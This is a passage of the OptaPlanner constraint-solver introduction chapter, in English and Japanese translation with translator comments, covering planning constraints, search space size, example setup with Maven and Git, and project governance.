A planning problem has (hard and soft) constraints\n\nA planning problem usually has at least two levels of constraints:\n\n* A _(negative) hard constraint_ must not be broken. For example: _1 teacher can not teach 2 different lessons at the same time_.\n* A _(negative) soft constraint_ should not be broken if it can be avoided. For example: _Teacher A does not like to teach on Friday afternoon_.\n\nSome problems also have positive constraints:\n\n* A _positive soft constraint (or reward)_ should be fulfilled if possible. For example: _Teacher B likes to teach on Monday morning_.\n\nSome basic problems (such as the N Queens problem) only have hard constraints. Some problems have three or more levels of constraints, for example hard, medium and soft constraints.\n\nThese constraints define the _score calculation_ (also known as the _fitness function_) of a planning problem. Each solution of a planning problem is given a score, so the solutions can be ranked against each other. *With OptaPlanner, score constraints are written in an object oriented language, such as Java code, or in Drools rules.* Such code is easy, flexible and scalable.
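\n\nFor instance, a naive score function for the N Queens example could look roughly like this minimal sketch. It assumes the +NQueens+ and +Queen+ domain classes from the examples distribution, the 6.x +EasyScoreCalculator+ API and a fully initialized solution; it counts one penalty point per pair of attacking queens.\n\n----\nimport java.util.List;\nimport org.optaplanner.core.api.score.buildin.simple.SimpleScore;\nimport org.optaplanner.core.impl.score.director.easy.EasyScoreCalculator;\nimport org.optaplanner.examples.nqueens.domain.NQueens;\nimport org.optaplanner.examples.nqueens.domain.Queen;\n\npublic class NQueensEasyScoreCalculator implements EasyScoreCalculator<NQueens> {\n\n    public SimpleScore calculateScore(NQueens nQueens) {\n        int conflicts = 0;\n        List<Queen> queenList = nQueens.getQueenList();\n        for (int i = 0; i < queenList.size(); i++) {\n            for (int j = i + 1; j < queenList.size(); j++) {\n                Queen a = queenList.get(i);\n                Queen b = queenList.get(j);\n                \/\/ Two queens attack each other when they share a row or a\n                \/\/ diagonal (they are on different columns by construction).\n                if (a.getRowIndex() == b.getRowIndex()\n                        || a.getAscendingDiagonalIndex() == b.getAscendingDiagonalIndex()\n                        || a.getDescendingDiagonalIndex() == b.getDescendingDiagonalIndex()) {\n                    conflicts++;\n                }\n            }\n        }\n        \/\/ Negative score: the fewer conflicts, the better the solution.\n        return SimpleScore.valueOf(-conflicts);\n    }\n}\n----\n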
\n\n\n[[aPlanningProblemHasAHugeSearchSpace]]\n=== 1.3.3. A planning problem has a huge search space\n\nA planning problem has a number of _solutions_. There are several categories of solutions:\n\n* A _possible solution_ is any solution, whether or not it breaks any number of constraints. Planning problems tend to have an incredibly large number of possible solutions. Many of those solutions are worthless.\n* A _feasible solution_ is a solution that does not break any (negative) hard constraints. The number of feasible solutions tends to be relative to the number of possible solutions. Sometimes there are no feasible solutions. Every feasible solution is a possible solution.\n* An _optimal solution_ is a solution with the highest score. A planning problem tends to have one or a few optimal solutions. There is always at least one optimal solution, even when there are no feasible solutions and the optimal solution is not feasible.\n* The _best solution found_ is the solution with the highest score found by an implementation in a given amount of time. The best solution found is likely to be feasible and, given enough time, it tends to be the optimal solution.\n\nCounterintuitively, the number of possible solutions is huge (if calculated correctly), even with a small dataset. As you can see in the examples, most instances have far more possible solutions than the minimal number of atoms in the known universe (10^80^). Because there is no silver bullet to find the optimal solution, no implementation can do better than evaluate only a subset of all those possible solutions.
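\n\nTo get a feel for those numbers, here is a small plain Java sketch (the class name is illustrative) that computes the raw search space size of a 64 queens instance, where each of the 64 queens independently gets one of 64 rows:\n\n----\nimport java.math.BigInteger;\n\npublic class SearchSpaceSize {\n    public static void main(String[] args) {\n        \/\/ One queen per column: each of the 64 queens independently gets\n        \/\/ one of 64 rows, so there are 64^64 possible solutions.\n        BigInteger size = BigInteger.valueOf(64).pow(64);\n        \/\/ Prints a 116-digit number, roughly 10^115: far more than the\n        \/\/ number of atoms in the known universe.\n        System.out.println(\"64^64 = \" + size);\n    }\n}\n----\n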
\n\nOptaPlanner supports several optimization algorithms to efficiently wade through that incredibly large number of possible solutions. Depending on the use case, some optimization algorithms perform better than others, but it is impossible to tell in advance. *With OptaPlanner, it is easy to switch between optimization algorithms*: just change the solver configuration in a few lines of XML or code.
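\n\nFor illustration, such a configuration could look roughly like the sketch below (element names follow the 6.x configuration schema; the termination limit and algorithm choices are illustrative, not recommendations):\n\n----\n<solver>\n  <!-- Domain and score configuration omitted for brevity -->\n  <termination>\n    <secondsSpentLimit>30<\/secondsSpentLimit>\n  <\/termination>\n  <constructionHeuristic>\n    <constructionHeuristicType>FIRST_FIT<\/constructionHeuristicType>\n  <\/constructionHeuristic>\n  <localSearch>\n    <!-- Replace this acceptor to try another metaheuristic -->\n    <acceptor>\n      <entityTabuSize>7<\/entityTabuSize>\n    <\/acceptor>\n  <\/localSearch>\n<\/solver>\n----\n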
\n\n\n[[downloadAndRunTheExamples]]\n== 1.4. Download and run the examples\n\n[[getTheReleaseZipAndRunTheExamples]]\n=== 1.4.1. Get the release .zip and run the examples\n\nLet's try it now:\n\n{empty}1. Download a release .zip of OptaPlanner from link:https:\/\/www.optaplanner.org\/[the OptaPlanner website].\n\n{empty}2. Unzip it.\n\n{empty}3. Open the +*examples*+ directory and run the script.\n\nLinux or Mac:\n\n\/\/ [source] \/\/\n----\n$ cd examples\n$ .\/runExamples.sh\n----\n\nWindows:\n\n\/\/ [source] \/\/\n----\n$ cd examples\n$ runExamples.bat\n----\n\n\/\/ image::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/distributionZip.png[] \/\/\nimage:https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/distributionZip.png[]\n\nThe examples GUI application will open. Pick an example.\n\nimage::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/plannerExamplesAppScreenshot.png[]\n\n\n.Note\n****\nOptaPlanner itself has no GUI dependencies. It runs just as well on a server or a mobile JVM as it does on the desktop.\n****\n\n\n\n[[runTheExamplesInAnIDE]]\n=== 1.4.2. Run the examples in an IDE (IntelliJ, Eclipse, NetBeans)\n\nTo run the examples in your favorite IDE:\n\n{empty}1. Configure your IDE.\n* In IntelliJ IDEA and NetBeans, just open +*examples\/sources\/pom.xml*+ as a new project; the Maven integration will take care of the rest.\n* In Eclipse, open a new project for the directory +*examples\/sources*+.\n** Add all the jars in the directories +*binaries*+ and +*examples\/binaries*+ to the classpath, except for the file +*examples\/binaries\/optaplanner-examples-_version_.jar*+.\n** Add the Java source directory +*src\/main\/java*+ and the Java resources directory +*src\/main\/resources*+.\n\n{empty}2. Create a run configuration.\n* Main class: +org.optaplanner.examples.app.OptaPlannerExamplesApp+\n* VM parameters (optional): +-Xmx512M -server+\n\n{empty}3. Run that run configuration.\n\n\n\n[[useWithMavenGradleEtc]]\n=== 1.4.3.
Use OptaPlanner with Maven, Gradle, Ivy, Buildr or ANT\n\nThe OptaPlanner jars are also available in link:http:\/\/search.maven.org\/#search|ga|1|org.optaplanner[the Maven Central Repository] (and also in link:https:\/\/repository.jboss.org\/nexus\/index.html#nexus-search;gav~org.optaplanner~~~~[the JBoss Maven Repository]).\n\nIf you use Maven, add a dependency to +optaplanner-core+ in your project's +*pom.xml*+, as follows:\n\n----\n <dependency>\n <groupId>org.optaplanner<\/groupId>\n <artifactId>optaplanner-core<\/artifactId>\n <\/dependency>\n----\n\nThis works similarly for Gradle, Ivy and Buildr. To find out the latest version, check link:http:\/\/search.maven.org\/#search|ga|1|org.optaplanner[the Maven Central Repository].\n\nBecause you might end up using other OptaPlanner modules too, it is recommended to import +optaplanner-bom+ in Maven's +dependencyManagement+, as follows, so the OptaPlanner version only needs to be specified once:\n\n----\n <dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>org.optaplanner<\/groupId>\n <artifactId>optaplanner-bom<\/artifactId>\n <type>pom<\/type>\n <version>...<\/version>\n <scope>import<\/scope>\n <\/dependency>\n ...\n <\/dependencies>\n <\/dependencyManagement>\n----\n\nIf you are still using ANT (without Ivy), copy all the jars from the +*binaries*+ directory of the download zip to your classpath.
\n\n.Note\n****\nThe +*binaries*+ directory of the download zip contains far more jars than +optaplanner-core+ actually uses. It also contains the jars used by other modules, such as +optaplanner-benchmark+.\n\nCheck the +*pom.xml*+ files in the Maven repository to determine the minimal dependency set of a specific module (of a specific version).\n****\n\n\n\n[[buildFromSource]]\n=== 1.4.4. Build OptaPlanner from source\n\nIt is easy to build OptaPlanner from source:\n\n{empty}1. link:https:\/\/help.github.com\/articles\/set-up-git\/[Set up Git] and run +clone optaplanner+ from GitHub. (Or, alternatively, download link:https:\/\/github.com\/droolsjbpm\/optaplanner\/zipball\/master[the zipball].)\n\n----\n$ git clone git@github.com:droolsjbpm\/optaplanner.git optaplanner\n...\n----\n\n.Note\n****\nIf you don't have a GitHub account, or your local Git installation is not configured with it, use the following command instead, to avoid an authentication issue:\n----\n$ git clone https:\/\/github.com\/droolsjbpm\/optaplanner.git optaplanner\n...\n----\n****\n\n{empty}2. Build it with link:http:\/\/maven.apache.org\/[Maven]:\n\n----\n$ cd optaplanner\n$ mvn clean install -DskipTests\n...\n----\n\n.Note\n****\nThe first time, Maven might take a while, because it needs to download jars.\n****\n\n{empty}3. Run the examples:\n\n----\n$ cd optaplanner-examples\n$ mvn exec:exec\n...\n----\n\n{empty}4. Edit the sources in your favorite IDE.\n\n{empty}5. Optional: use a Java profiler.\n\n\n\n[[governance]]\n== 1.5. Governance\n\n[[statusOfOptaPlanner]]\n=== 1.5.1.
OptaPlanner \u306e\u30ec\u30d9\u30eb\u306e\u9ad8\u3055\n\nOptaPlanner \u304c\u6301\u3064\u7279\u9577:\n\n* *\u5b89\u5b9a\u6027*: \u30e6\u30cb\u30c3\u30c8\u3054\u3068\u306e\u30c6\u30b9\u30c8, \u7d71\u5408\u74b0\u5883\u3067\u306e\u30c6\u30b9\u30c8, \u30b9\u30c8\u30ec\u30b9\u30c6\u30b9\u30c8\u306b\u3088\u3063\u3066\u975e\u5e38\u306b\u3088\u304f\u30c6\u30b9\u30c8\u3055\u308c\u3066\u3044\u308b\u3002\n* *\u4fe1\u983c\u6027*: \u4e16\u754c\u4e2d\u3067\u3001\u88fd\u54c1\u3067\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u3002\n* *\u30b9\u30b1\u30fc\u30e9\u30d3\u30ea\u30c6\u30a3*: \u30b5\u30f3\u30d7\u30eb\u306e\u4e00\u3064\u3067\u306f\u300150000 \u500b\u306e\u5909\u6570\u304c\u6271\u308f\u308c\u3001\u305d\u306e 5000 \u500b\u3054\u3068\u306b\u3001\u8907\u6570\u306e\u7a2e\u985e\u306e\u5236\u7d04\u3068\u305d\u308c\u3092\u6e80\u305f\u3059\u4f55\u5104\u3082\u306e\u30d1\u30bf\u30fc\u30f3\u304c\u6271\u308f\u308c\u3066\u3044\u308b\u3002\n* *\u6574\u5099\u3055\u308c\u305f\u6587\u66f8*: \u8a73\u7d30\u306a\u672c\u30de\u30cb\u30e5\u30a2\u30eb\u3084\u591a\u304f\u306e\u30b5\u30f3\u30d7\u30eb\u306e\u4e00\u3064\u3092\u898b\u3066\u304f\u3060\u3055\u3044\u3002\n\n\n\n[[backwardsCompatibility]]\n=== 1.5.2. \u5f8c\u65b9\u4e92\u63db\u6027\n\nOptaPlanner \u3067\u306f\u3001API \u3068\u5b9f\u88c5\u304c\u5206\u96e2\u3055\u308c\u307e\u3059\u3002\n\n* *\u30d1\u30d6\u30ea\u30c3\u30af API:* \u30d1\u30c3\u30b1\u30fc\u30b8\u540d\u524d\u7a7a\u9593 +*org.optaplanner.core.api*+ \u306f\u3001\u5c06\u6765\u306e\u30ea\u30ea\u30fc\u30b9\u306b\u304a\u3044\u3066\u3001100% \u306e\u5f8c\u65b9\u4e92\u63db\u6027\u3092\u6709\u3057\u307e\u3059\u3002\n* *Impl \u30af\u30e9\u30b9:* \u30d1\u30c3\u30b1\u30fc\u30b8\u540d\u524d\u7a7a\u9593 +*org.optaplanner.core.impl*+ \u306b\u3042\u308b\u3059\u3079\u3066\u306e\u30af\u30e9\u30b9\u306b\u306f\u3001\u5f8c\u65b9\u4e92\u63db\u6027\u304c\u3042\u308a\u307e\u305b\u3093\u3002\u5c06\u6765\u306e\u30ea\u30ea\u30fc\u30b9\u306b\u304a\u3044\u3066\u5909\u66f4\u3055\u308c\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002link:https:\/\/github.com\/droolsjbpm\/optaplanner\/blob\/master\/optaplanner-distribution\/src\/main\/assembly\/filtered-resources\/UpgradeFromPreviousVersionRecipe.txt[UpgradeFromPreviousVersionRecipe.txt]\u3068\u547c\u3070\u308c\u308b\u30ec\u30b7\u30d4\u306b\u306f\u3001\u65b0\u3057\u3044\u30d0\u30fc\u30b8\u30e7\u30f3\u306b\u30a2\u30c3\u30d7\u30b0\u30ec\u30fc\u30c9\u3059\u308b\u5834\u5408\u306e\u3001\u5404\u5909\u66f4\u5185\u5bb9\u304a\u3088\u3073\u305d\u306e\u5909\u66f4\u306b\u3059\u3070\u3084\u304f\u5bfe\u51e6\u3059\u308b\u65b9\u6cd5\u304c\u8a18\u8ff0\u3055\u308c\u3066\u3044\u307e\u3059\u3002\n* *XML \u8a2d\u5b9a:* XML \u30bd\u30eb\u30d0\u8a2d\u5b9a\u306f\u3001\u975e\u30d1\u30d6\u30ea\u30c3\u30af API \u30af\u30e9\u30b9\u3092\u4f7f\u7528\u3059\u308b\u5fc5\u8981\u306e\u3042\u308b\u8981\u7d20\u3092\u9664\u304f\u3059\u3079\u3066\u306e\u8981\u7d20\u306b\u3064\u3044\u3066\u3001\u5f8c\u65b9\u4e92\u63db\u6027\u3092\u6709\u3057\u307e\u3059\u3002XML \u30bd\u30eb\u30d0\u8a2d\u5b9a\u306f\u3001\u30d1\u30c3\u30b1\u30fc\u30b8\u540d\u524d\u7a7a\u9593 +*org.optaplanner.core.config*+ \u306b\u3042\u308b\u30af\u30e9\u30b9\u306b\u3088\u3063\u3066\u5b9a\u7fa9\u3055\u308c\u307e\u3059\u3002\n\n.\u6ce8\u610f\n****\n\u672c\u8aac\u660e\u66f8\u3067\u306f\u3001impl \u30af\u30e9\u30b9\u3082\u3044\u304f\u3064\u304b\u6271\u308f\u308c\u3066\u3044\u307e\u3059\u3002\u305d\u308c\u3089\u6587\u66f8\u5316\u3055\u308c\u305f impl 
\u30af\u30e9\u30b9\u306f\u3001(\u672c\u8aac\u660e\u66f8\u3067\u5b9f\u9a13\u7684\u306a\u3082\u306e\u3060\u3068\u660e\u8a18\u3055\u308c\u306a\u3044\u9650\u308a) \u4fe1\u983c\u6027\u304c\u3042\u308a\u3001\u5b89\u5168\u306b\u4f7f\u7528\u3067\u304d\u307e\u3059\u3002\u305f\u3060\u3057\u3001\u305d\u308c\u3089\u306f\u3001\u78ba\u5b9a\u7684\u306b\u8a18\u8ff0\u3059\u308b\u306b\u306f\u307e\u3060\u6642\u671f\u5c1a\u65e9\u306a\u3082\u306e\u3060\u3068\u79c1\u305f\u3061\u306f\u8003\u3048\u3066\u3044\u307e\u3059\u3002\n\/\/\/\/\n150915 Takugo\nSource: we're just not entirely comfortable yet to write their signatures in stone\nInterpreted as: the impl classes are still subject to changes. \n\/\/\/\/\n****\n\n\n\n[[communityAndSupport]]\n=== 1.5.3. \u30b3\u30df\u30e5\u30cb\u30c6\u30a3\u3068\u30b5\u30dd\u30fc\u30c8\n\n\u30cb\u30e5\u30fc\u30b9\u3084\u8a18\u4e8b\u306f\u3001link:https:\/\/www.optaplanner.org\/blog\/[\u79c1\u305f\u3061\u306e\u30d6\u30ed\u30b0] \u3084 Google+ (link:https:\/\/plus.google.com\/\\+OptaPlannerOrg[OptaPlanner], link:https:\/\/plus.google.com\/\\+GeoffreyDeSmet[Geoffrey De Smet])\u3001Twitter (link:https:\/\/twitter.com\/OptaPlanner[OptaPlanner], link:https:\/\/twitter.com\/GeoffreyDeSmet[Geoffrey De Smet]) \u3067\u78ba\u8a8d\u3057\u3066\u304f\u3060\u3055\u3044\u3002*OptaPlanner \u304c\u5f79\u306b\u7acb\u3063\u305f\u5834\u5408\u306b\u306f\u3001\u305d\u306e\u3053\u3068\u306b\u3064\u3044\u3066\u30d6\u30ed\u30b0\u306b\u66f8\u3044\u305f\u308a Twitter \u3067\u3064\u3076\u3084\u3044\u305f\u308a\u3057\u3066\u3001\u79c1\u305f\u3061\u3092\u3054\u652f\u63f4\u304f\u3060\u3055\u3044\uff01*\n\nlink:https:\/\/www.optaplanner.org\/community\/forum.html[\u79c1\u305f\u3061\u306e\u30b3\u30df\u30e5\u30cb\u30c6\u30a3\u30fc\u306e\u516c\u958b\u30d5\u30a9\u30fc\u30e9\u30e0]\u3067\u306e\u8cea\u554f\u3084link:https:\/\/issues.jboss.org\/browse\/PLANNER[\u8ab2\u984c\u30c8\u30e9\u30c3\u30ab\u30fc]\u3067\u306e\u30d0\u30b0\u5831\u544a\u3001\u6a5f\u80fd\u8981\u671b\u3092\u6b53\u8fce\u3057\u307e\u3059\u3002GitHub \u3078\u306e pull \u8981\u6c42\u3092\u5927\u3044\u306b\u6b53\u8fce\u3057\u3001\u512a\u5148\u7684\u306b\u6271\u3044\u307e\u3059\uff01\u3054\u81ea\u8eab\u306e\u6539\u5584\u3092\u30aa\u30fc\u30d7\u30f3\u30bd\u30fc\u30b9\u5316\u3059\u308c\u3070\u3001\u305d\u308c\u306b\u5bfe\u3057\u3066\u79c1\u305f\u3061\u304c\u52a0\u3048\u308b\u5c02\u9580\u7684\u306a\u30c1\u30a7\u30c3\u30af\u3084\u3055\u3089\u306a\u308b\u6539\u826f\u3092\u3054\u81ea\u8eab\u306e\u305f\u3081\u306b\u5f79\u7acb\u3066\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\n\nRed Hat \u306f\u3001\u4e2d\u6838\u3068\u306a\u308b\u30c1\u30fc\u30e0\u3092\u96c7\u7528\u3059\u308b\u5f62\u3067\u3001OptaPlanner \u306e\u5c55\u958b\u3092\u5f8c\u63f4\u3057\u3066\u3044\u307e\u3059\u3002\u4f01\u696d\u5411\u3051\u306e\u30b5\u30dd\u30fc\u30c8\u3084\u30b3\u30f3\u30b5\u30eb\u30c6\u30a3\u30f3\u30b0\u306b\u3064\u3044\u3066\u306f\u3001link:https:\/\/www.optaplanner.org\/community\/product.html[BRMS \u304a\u3088\u3073 BPMS \u88fd\u54c1] (\u542b OptaPlanner) \u3092\u53c2\u7167\u3059\u308b\u304b\u3001link:http:\/\/www.redhat.com\/en\/about\/contact\/sales[Red Hat \u3078\u304a\u554f\u3044\u5408\u308f\u305b]\u304f\u3060\u3055\u3044\u3002\n\n\n\n[[relationshipWithKie]]\n=== 1.5.4. 
Drools \u3084 jBPM \u3068\u306e\u95a2\u4fc2\n\nOptaPlanner \u306f\u3001link:https:\/\/www.kiegroup.org\/[KIE \u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u30fb\u30b0\u30eb\u30fc\u30d7]\u306e\u4e00\u90e8\u3067\u3059\u3002KIE \u30b0\u30eb\u30fc\u30d7\u306f\u3001link:https:\/\/www.drools.org\/[Drools] \u30eb\u30fc\u30eb\u30a8\u30f3\u30b8\u30f3\u3068 link:https:\/\/www.jbpm.org\/[jBPM] \u30ef\u30fc\u30af\u30d5\u30ed\u30fc\u30a8\u30f3\u30b8\u30f3\u3068\u3068\u3082\u306b\u3001\u5b9a\u671f\u7684\u306b (\u901a\u5e38 1\u301c2 \u56de\/\u6708) \u30ea\u30ea\u30fc\u30b9\u3055\u308c\u307e\u3059\u3002\n\/\/\/\/\n150916 Takugo\nSource: It releases regularly\nInterpreted as: The KIE group is released regularly\n\/\/\/\/\n\nimage::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/kieFunctionalityOverview.png[]\n\nDrools \u3092\u7528\u3044\u305f\u30aa\u30d7\u30b7\u30e7\u30f3\u306e\u7d71\u5408\u306b\u3064\u3044\u3066\u3088\u308a\u591a\u304f\u77e5\u308b\u306b\u306f\u3001link:https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/index.html#architectureOverview[\u69cb\u9020\u306e\u6982\u8981]\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\n\n\n\n","old_contents":"= Chapter 1. OptaPlanner \u30a4\u30f3\u30c8\u30ed\u30c0\u30af\u30b7\u30e7\u30f3\n:awestruct-description: Chapter 1. OptaPlanner \u30a4\u30f3\u30c8\u30ed\u30c0\u30af\u30b7\u30e7\u30f3\n:awestruct-layout: localizedBase\n:awestruct-lang: ja\n:awestruct-priority: 1.0\n:showtitle:\n\n\n\nxref:whatIsOptaPlanner[1.1. OptaPlanner \u3068\u306f\u4f55\u3067\u3059\u304b\uff1f]:: \nxref:requirements[1.2. \u5fc5\u8981\u306a\u3082\u306e]:: \nxref:whatIsAPlanningProblem[1.3. \u8a08\u753b\u554f\u984c\u3068\u306f\uff1f]:: \nxref:aPlanningProblemIsNPCompleteOrNPHard[1.3.1. \u8a08\u753b\u554f\u984c\u306f NP \u5b8c\u5168\u307e\u305f\u306f NP \u56f0\u96e3]::: \nxref:aPlanningProblemHasConstraints[1.3.2. \u8a08\u753b\u554f\u984c\u306b\u306f\u5236\u7d04\u304c\u3042\u308b\uff08\u30cf\u30fc\u30c9, \u30bd\u30d5\u30c8\u5236\u7d04\uff09]::: \nxref:aPlanningProblemHasAHugeSearchSpace[1.3.3. \u8a08\u753b\u554f\u984c\u306f\u5de8\u5927\u306a\u63a2\u7d22\u7a7a\u9593\u3092\u6301\u3064]::: \nxref:downloadAndRunTheExamples[1.4. \u30b5\u30f3\u30d7\u30eb\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3068\u5b9f\u884c]:: \nxref:getTheReleaseZipAndRunTheExamples[1.4.1. \u516c\u958b .zip \u306e\u5165\u624b\u3068\u30b5\u30f3\u30d7\u30eb\u306e\u5b9f\u884c]::: \nxref:runTheExamplesInAnIDE[1.4.2. IDE (IntelliJ, Eclipse, NetBeans) \u3067\u306e\u30b5\u30f3\u30d7\u30eb\u306e\u5b9f\u884c]::: \nxref:useWithMavenGradleEtc[1.4.3. OptaPlanner \u3092 Maven \u3084 Gradle, Ivy, Buildr, ANT \u3068\u3068\u3082\u306b\u4f7f\u3046]::: \nxref:buildFromSource[1.4.4. OptaPlanner \u3092\u30bd\u30fc\u30b9\u304b\u3089\u30d3\u30eb\u30c9\u3059\u308b]::: \nxref:governance[1.5. \u7ba1\u7406\u30fb\u904b\u55b6]:: \nxref:statusOfOptaPlanner[1.5.1. OptaPlanner \u306e\u30ec\u30d9\u30eb\u306e\u9ad8\u3055]::: \nxref:backwardsCompatibility[1.5.2. \u5f8c\u65b9\u4e92\u63db\u6027]::: \nxref:communityAndSupport[1.5.3. \u30b3\u30df\u30e5\u30cb\u30c6\u30a3\u3068\u30b5\u30dd\u30fc\u30c8]::: \nxref:relationshipWithKie[1.5.4. 
Drools \u3084 jBPM \u3068\u306e\u95a2\u4fc2]::: \n\n[]\n[[whatIsOptaPlanner]]\n== 1.1. OptaPlanner \u3068\u306f\u4f55\u3067\u3059\u304b\uff1f\n\nimage::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/optaPlannerLogo.png[]\n\n*link:https:\/\/www.optaplanner.org\/[OptaPlanner] \u306f\u3001\u8a08\u753b\u554f\u984c\u306e\u6700\u9069\u89e3\u3092\u5f97\u308b\u3001\u7d44\u307f\u8fbc\u307f\u53ef\u80fd\u3067\u8efd\u91cf\u306a\u5236\u7d04\u5145\u8db3\u30a8\u30f3\u30b8\u30f3\u3067\u3059\u3002* \u6b21\u306e\u3088\u3046\u306a\u30e6\u30fc\u30b9\u30b1\u30fc\u30b9\u3092\u89e3\u304d\u307e\u3059\u3002\n\/\/\/\/\n150907 by Takugo\nSource: which optimizes planning problems\nInterpreted as: which obtains optimized solutions for planning problems\n\u201c\u554f\u984c\u201d\u3092\u6700\u9069\u5316\u3059\u308b\u306e\u3067\u306f\u306a\u3044\u304b\u3089\u3002\n\/\/\/\/\n\n* *\u5f93\u696d\u54e1\u30b7\u30d5\u30c8\u52e4\u52d9\u8a08\u753b:* \u770b\u8b77\u5e2b\u3084\u4fee\u7406\u5de5\u306a\u3069\u306e\u52e4\u52d9\u8868\u4f5c\u6210\n* *\u5b9f\u65bd\u30b9\u30b1\u30b8\u30e5\u30fc\u30ea\u30f3\u30b0:* \u4f1a\u8b70, \u8a2d\u5099, \u30e1\u30f3\u30c6\u30ca\u30f3\u30b9\u4f5c\u696d, \u5e83\u544a\u306a\u3069\u306e\u30b9\u30b1\u30b8\u30e5\u30fc\u30ea\u30f3\u30b0\n* *\u6559\u80b2\u6642\u9593\u5272\u308a:* \u6388\u696d, \u8b1b\u5ea7, \u8a66\u9a13, \u4f1a\u8b70\u30d7\u30ec\u30bc\u30f3\u30c6\u30fc\u30b7\u30e7\u30f3\u306a\u3069\u306e\u30b9\u30b1\u30b8\u30e5\u30fc\u30ea\u30f3\u30b0\n* *\u8f38\u9001\u7d4c\u8def\u8a08\u753b:* \u8377\u7269\u304a\u3088\u3073\uff0f\u307e\u305f\u306f\u4eba\u3092\u4e57\u305b\u305f\u4e57\u308a\u7269 (\u30c8\u30e9\u30c3\u30af, \u5217\u8eca, \u8239\u8236, \u98db\u884c\u6a5f\u306a\u3069) \u306e\u8a08\u753b\n* *\u7bb1\u8a70\u3081\uff08\u30d3\u30f3\u30d1\u30c3\u30ad\u30f3\u30b0\uff09:* \u30b3\u30f3\u30c6\u30ca, \u30c8\u30e9\u30c3\u30af, \u8239\u8236\u3078\u306e\u7a4d\u8f09\u3084\u5009\u5eab\u3078\u306e\u4fdd\u7ba1, \u3055\u3089\u306b\u306f\u30af\u30e9\u30a6\u30c9\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u306e\u30ce\u30fc\u30c9\u306a\u3069\u3082\n* *\u6ce8\u6587\u751f\u7523\u30b9\u30b1\u30b8\u30e5\u30fc\u30ea\u30f3\u30b0:* \u81ea\u52d5\u8eca\u7d44\u7acb\u30e9\u30a4\u30f3, \u6a5f\u68b0\u51e6\u7406, \u4eba\u54e1\u4f5c\u696d\u306a\u3069\u306e\u8a08\u753b\n* *\u5728\u5eab\u524a\u6e1b:* \u7d19\u3084\u92fc, \u30ab\u30fc\u30da\u30c3\u30c8\u306a\u3069\u306e\u5207\u65ad\u3067\u751f\u3058\u308b\u7121\u99c4\u306e\u6700\u5c11\u5316\n* *\u30b9\u30dd\u30fc\u30c4\u306b\u304a\u3051\u308b\u30b9\u30b1\u30b8\u30e5\u30fc\u30ea\u30f3\u30b0:* \u30d5\u30c3\u30c8\u30dc\u30fc\u30eb\u3084\u91ce\u7403\u306a\u3069\u306e\u30ea\u30fc\u30b0\u6226\u8a08\u753b\n\/\/\/\/\n150907 by Takugo\nSource: planning football leagues, baseball leagues, ...\nInterpreted as: planning the league games of football, baseball, ...\n\/\/\/\/\n* *\u8ca1\u52d9\u6700\u9069\u5316:* \u6295\u8cc7\u30dd\u30fc\u30c8\u30d5\u30a9\u30ea\u30aa\u306e\u6700\u9069\u5316, \u30ea\u30b9\u30af\u5206\u6563\u306a\u3069\n\nimage::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/useCaseOverview.png[]\n\n\u3042\u3089\u3086\u308b\u7d44\u7e54\u304c\u8a08\u753b\u554f\u984c\u306b\u76f4\u9762\u3057\u3066\u3044\u307e\u3059\u3002\u88fd\u54c1\u3084\u30b5\u30fc\u30d3\u30b9\u306f\u3001_\u5236\u7d04\u3092\u53d7\u3051_ \u3001\u9650\u5b9a\u3055\u308c\u305f\u30ea\u30bd\u30fc\u30b9 (\u5f93\u696d\u54e1, \u8cc7\u7523, \u6642\u9593, \u91d1) 
\u3092\u4f7f\u3063\u3066\u63d0\u4f9b\u3055\u308c\u3066\u3044\u307e\u3059\u3002OptaPlanner \u306f\u3001\u305d\u306e\u3088\u3046\u306a\u8a08\u753b\u3092\u6700\u9069\u5316\u3059\u308b\u3053\u3068\u306b\u3088\u3063\u3066\u3001\u3088\u308a\u5c11\u306a\u3044\u30ea\u30bd\u30fc\u30b9\u3067\u3088\u308a\u591a\u304f\u306e\u696d\u52d9\u3092\u5b9f\u884c\u3067\u304d\u308b\u3088\u3046\u306b\u3057\u307e\u3059\u3002\u3053\u308c\u306f\u3001_\u30aa\u30da\u30ec\u30fc\u30b7\u30e7\u30f3\u30ba\u30ea\u30b5\u30fc\u30c1_ \u5206\u91ce\u306e\u4e00\u3064\u3067\u3042\u308b _\u5236\u7d04\u5145\u8db3\u30d7\u30ed\u30b0\u30e9\u30df\u30f3\u30b0_ \u3068\u3057\u3066\u77e5\u3089\u308c\u3066\u3044\u307e\u3059\u3002\n\/\/\/\/\n150917 Takugo\nSource: Constraint Satisfaction Programming\nInterpreted as: Constraint Programming (without \"satisfaction\") = \u5236\u7d04\u30d7\u30ed\u30b0\u30e9\u30df\u30f3\u30b0, not the meaning of programming problem = \u8a08\u753b\u554f\u984c\n\/\/\/\/\n\nimage::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/whatIsAPlanningProblem.png[]\n\nOptaPlanner \u306e\u52a9\u3051\u304c\u3042\u308c\u3070\u3001\u666e\u901a\u306e Java(TM) \u30d7\u30ed\u30b0\u30e9\u30de\u30fc\u3067\u3082\u5236\u7d04\u5145\u8db3\u554f\u984c\u3092\u52b9\u7387\u3088\u304f\u89e3\u304f\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002OptaPlanner 